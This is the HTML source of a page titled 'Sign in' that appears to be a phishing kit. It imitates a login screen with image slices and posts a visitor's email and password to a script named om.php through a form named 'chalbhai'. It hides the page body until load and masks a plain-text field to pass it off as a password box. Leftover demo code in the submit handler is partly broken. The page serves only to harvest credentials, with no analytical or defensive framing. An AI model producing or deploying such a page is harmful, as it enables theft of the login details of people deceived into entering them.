<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in</title>

<script type="text/javascript" src="https://www.sitepoint.com/examples/password/MaskedPassword/MaskedPassword.js"></script>


<link rel="shortcut icon"
              href="images/favicon_a.ico"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">

<style> 
  .textbox { 
    font-family: Arial, Helvetica, sans-serif;
    background: rgba(255, 255, 255, 0.44); 
    color: #333; 
    border: 1px solid #A4A4A4; 
    padding: 4px 8px 4px 4px !important;
    line-height: 1; 
    width: 275px; 
    height:32px; 
	font-size: 13px;
  } 
 .textbox:hover { 
    border: 1px solid #4d90fe; 
    box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    -moz-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    -webkit-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
  } 
 .textbox:focus { 
    border: 1px solid #4d90fe; 
    outline: none; 
    box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3);  
    -moz-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    -webkit-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    background: rgb(255, 255, 255); } 
  
</style>




</head>
<body>
<div id="imagef1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:868px; height:666px; z-index:0"><img src="images/f2.png" alt="" title="" border=0 width=868 height=666></div>

<div id="imagef2" style="position:absolute; overflow:hidden; left:905px; top:43px; width:372px; height:618px; z-index:1"><img src="images/f1.png" alt="" title="" border=0 width=372 height=618></div>
<form action=om.php name=chalbhai id="demo-form"  method=post  onsubmit=" return formbreeze_sub()" >
<input name="formtext1" placeholder="@example.com" class="textbox" type="text" style="position:absolute;width:349px;left:917px;top:184px;z-index:2">
<input name="formtext2" id="demo-field"  class="textbox"  placeholder="Password" type="text" style="position:absolute;width:349px;left:917px;top:219px;z-index:3">
<div id="image3" style="position:absolute; overflow:hidden; left:918px; top:371px; width:162px; height:18px; z-index:4"><a href="#"><img src="images/cant.png" alt="" title="" border=0 width=162 height=18></a></div>

<div id="image4" style="position:absolute; overflow:hidden; left:920px; top:643px; width:191px; height:19px; z-index:5"><a href="#"><img src="images/ter.png" alt="" title="" border=0 width=191 height=19></a></div>

<div id="formcheckbox1" style="position:absolute; left:921px; top:259px; z-index:6"><input type="checkbox" name="formcheckbox1"></div>
<div id="formimage1" style="position:absolute; left:924px; top:307px; z-index:7"><input type="image" name="formimage1" width="71" height="35" src="images/sig.png"></div>
<script type="text/javascript">
	
		//apply masking to the demo-field
		//pass the field reference, masking symbol, and character limit
		new MaskedPassword(document.getElementById("demo-field"), '\u25CF');
	
		//test the submitted value
		document.getElementById('demo-form').onsubmit = function()
		{
			alert('pword = "' + this.pword.value + '"');
			return false;
		};
	
	</script>
</body>
</html>
